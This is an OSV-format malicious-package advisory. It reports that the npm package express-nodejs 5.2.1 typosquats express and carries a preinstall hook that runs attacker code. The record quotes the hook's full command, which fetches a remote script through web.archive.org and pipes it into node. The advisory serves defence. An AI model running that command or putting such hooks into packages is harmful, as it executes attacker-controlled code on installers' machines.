{"id":"MAL-2026-17243","summary":"Malicious code in express-nodejs (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9aea7dd76028cd443cf2f8d58fa5d8b3b28bb6db870f34d1cc6dad28db92fe93)\nexpress-nodejs@5.2.1 typosquats the express framework: package.json copies express's description, author (TJ Holowaychuk), repository (expressjs/express), and homepage while publishing under a different name. The package.json preinstall lifecycle hook runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`, piping a script fetched from an unrelated third-party Codeberg account (hellscripter/install-scripts) on a mutable branch, laundered through web.archive.org, directly into the node interpreter on the installer's host. This executes arbitrary attacker-controlled code at `npm install` time with no pinning, no integrity check, and no relationship to the express project. The fetched payload is mutable and its contents are not shipped in the tarball.\n","modified":"2026-09-29T15:00:05.475468455Z","published":"2026-09-29T14:40:14Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-020631","import_time":"2026-09-29T14:44:37.348435315Z","modified_time":"2026-09-29T14:40:14Z","sha256":"9aea7dd76028cd443cf2f8d58fa5d8b3b28bb6db870f34d1cc6dad28db92fe93","source":"amazon-inspector","versions":["5.2.1"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/express-nodejs/v/5.2.1"}],"affected":[{"package":{"name":"express-nodejs","ecosystem":"npm","purl":"pkg:npm/express-nodejs"},"versions":["5.2.1"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"filename":"express-nodejs-5.2.1.tgz","hashes":{"sha1":"899321111bfd44358cc22ce991d32cb101203dff","sha512_sri":"sha512-919mTtdAxNkaV9vMheghnKi4nL/XSrbfsO5G3Ago43rzz7ct24hPzC/pWZVpBkQA4ogAbWPsxTyKeWYiIuwUGQ=="}}],"evidence_files":[{"path":"package.json","sha256":"afa88132b139c981315a84389978151c8d9ab5bd2055a33783ed9d5b028ed6e0","tlsh":"ef51da21cc0e8c6326c5a6dd3c68a542616188078e41f81cf769539c8f8e52f71b9fbf"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-nodejs/MAL-2026-17243.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}